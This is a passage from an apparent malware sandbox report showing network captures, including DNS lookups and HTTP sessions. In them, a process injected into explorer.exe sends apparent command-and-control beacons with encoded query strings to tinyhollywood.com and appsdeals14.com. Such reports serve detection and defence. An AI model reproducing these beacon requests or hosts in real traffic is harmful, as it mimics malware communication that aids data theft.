                                                                    Oct 27, 2021 16:29:02.729450941 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729456902 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.729469061 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729518890 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.730592966 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731796980 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731847048 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731849909 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.731865883 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731910944 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.732968092 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734147072 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734198093 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734208107 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.734221935 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734267950 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.735337973 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735460997 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735510111 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:37.126528025 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:30:56.917968035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.936786890 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:56.937079906 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.937561035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.956696033 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115149021 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115207911 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115453959 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.115672112 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.134474039 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:31:02.178193092 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345493078 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.345706940 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345992088 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.513111115 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519042969 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519074917 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519308090 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.519490957 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.686786890 CEST804983568.66.224.28192.168.2.4

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2021 16:29:02.085024118 CEST4925753192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:29:02.104489088 CEST53492578.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:30:56.883162022 CEST6152253192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:30:56.907116890 CEST53615228.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:31:02.132074118 CEST5233753192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:31:02.176274061 CEST53523378.8.8.8192.168.2.4
                                                                    Oct 27, 2021 16:31:07.904279947 CEST5504653192.168.2.48.8.8.8
                                                                    Oct 27, 2021 16:31:07.928216934 CEST53550468.8.8.8192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Oct 27, 2021 16:29:02.085024118 CEST192.168.2.48.8.8.80xc423Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.883162022 CEST192.168.2.48.8.8.80x49ffStandard query (0)www.tinyhollywood.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.132074118 CEST192.168.2.48.8.8.80x5817Standard query (0)www.appsdeals14.comA (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.904279947 CEST192.168.2.48.8.8.80xbe18Standard query (0)www.eeeptou.xyzA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Oct 27, 2021 16:29:02.104489088 CEST8.8.8.8192.168.2.40xc423No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST8.8.8.8192.168.2.40x49ffNo error (0)www.tinyhollywood.comtinyhollywood.comCNAME (Canonical name)IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST8.8.8.8192.168.2.40x49ffNo error (0)tinyhollywood.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST8.8.8.8192.168.2.40x5817No error (0)www.appsdeals14.comappsdeals14.comCNAME (Canonical name)IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST8.8.8.8192.168.2.40x5817No error (0)appsdeals14.com68.66.224.28A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST8.8.8.8192.168.2.40xbe18No error (0)www.eeeptou.xyz104.21.96.92A (IP address)IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST8.8.8.8192.168.2.40xbe18No error (0)www.eeeptou.xyz172.67.176.70A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.google.com
                                                                    • www.tinyhollywood.com
                                                                    • www.appsdeals14.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449757142.250.185.228443C:\Users\user\Desktop\583475.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.44983434.102.136.18080C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 27, 2021 16:30:56.937561035 CEST6158OUTGET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.tinyhollywood.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:30:57.115149021 CEST6159INHTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 27 Oct 2021 14:30:57 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "61774856-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.44983568.66.224.2880C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 27, 2021 16:31:02.345992088 CEST6160OUTGET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.appsdeals14.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:31:02.519042969 CEST6160INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 27 Oct 2021 14:31:02 GMT
                                                                    Server: Apache
                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.449757142.250.185.228443C:\Users\user\Desktop\583475.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-10-27 14:29:02 UTC0OUTGET / HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: Keep-Alive
                                                                    2021-10-27 14:29:02 UTC0INHTTP/1.1 200 OK
                                                                    Date: Wed, 27 Oct 2021 14:29:02 GMT
                                                                    Expires: -1
                                                                    Cache-Control: private, max-age=0
                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: CONSENT=PENDING+040; expires=Fri, 27-Oct-2023 14:29:02 GMT; path=/; domain=.google.com; Secure
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2021-10-27 14:29:02 UTC0INData Raw: 34 64 39 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                                                    Data Ascii: 4d99<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
                                                                    2021-10-27 14:29:02 UTC1INData Raw: 30 2c 31 35 37 35 37 2c 33 2c 35 37 36 2c 31 30 31 34 2c 31 2c 35 34 34 34 2c 31 34 39 2c 31 31 33 32 33 2c 39 39 31 2c 31 36 36 31 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 31 32 33 38 2c 35 38 30 31 2c 37 34 2c 31 39 38 33 2c 32 36 32 36 2c 32 30 31 35 2c 31 33 36 31 31 2c 34 37 36 34 2c 32 36 35 38 2c 37 33 35 37 2c 33 30 2c 35 36 31 36 2c 38 30 31 32 2c 31 35 39 33 2c 37 31 32 2c 36 33 38 2c 31 34 39 34 2c 31 36 37 38 36 2c 35 38 31 38 2c 32 35 33 39 2c 34 30 39 34 2c 33 31 33 38 2c 36 2c 39 30 38 2c 33 2c 33 35 34 31 2c 31 2c 35 30 39 36 2c 32 2c 31 2c 33 2c 36 38 34 31 2c 32 37 36 37 2c 31 38 31 34 2c 32 38 33 2c 33 38 2c 38 37 34 2c 35 39 39 32 2c 31 34 36 35 39 2c 37 38 38 2c 38 2c 32 2c 31 32 37 31 2c 31 37 31 35 2c 32 2c 38 34 39 36 2c 37 31 37 2c
                                                                    Data Ascii: 0,15757,3,576,1014,1,5444,149,11323,991,1661,4,1528,2304,1238,5801,74,1983,2626,2015,13611,4764,2658,7357,30,5616,8012,1593,712,638,1494,16786,5818,2539,4094,3138,6,908,3,3541,1,5096,2,1,3,6841,2767,1814,283,38,874,5992,14659,788,8,2,1271,1715,2,8496,717,
                                                                    2021-10-27 14:29:02 UTC2INData Raw: 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61
                                                                    Data Ascii: ction(){var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a
                                                                    2021-10-27 14:29:02 UTC3INData Raw: 6f 6e 28 29 7b 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 67 6f 6f 67 6c 65 2e 66 3d 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f
                                                                    Data Ascii: on(){};}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.sto
                                                                    2021-10-27 14:29:02 UTC5INData Raw: 62 67 20 2e 67 62 74 63 62 7b 6c 65 66 74 3a 30 7d 2e 67 62 78 78 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 78 6f 7b 6f 70 61 63 69 74 79 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20
                                                                    Data Ascii: bg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px
                                                                    2021-10-27 14:29:02 UTC6INData Raw: 69 6e 64 65 78 3a 32 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32
                                                                    Data Ascii: index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2
                                                                    2021-10-27 14:29:02 UTC7INData Raw: 31 30 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 70 64 6a 73 20 2e 67 62 74 6f 20 2e 67 62 6d 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 39 25 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61
                                                                    Data Ascii: 102px;background-repeat:repeat-x;outline:none;text-decoration:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;ba
                                                                    2021-10-27 14:29:02 UTC8INData Raw: 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e
                                                                    Data Ascii: t:visited{color:#900 !important}.gbmt,.gbml1,.gbmlb,.gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin
                                                                    2021-10-27 14:29:02 UTC10INData Raw: 74 63 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62
                                                                    Data Ascii: tc{padding:0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-b
                                                                    2021-10-27 14:29:02 UTC11INData Raw: 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 67 62 6d 70 61 73 62 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 23 67 62 6d 70 61 6c 20 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73
                                                                    Data Ascii: ght:0;text-align:right}#gbmpasb .gbps{color:#000}#gbmpal .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{dis
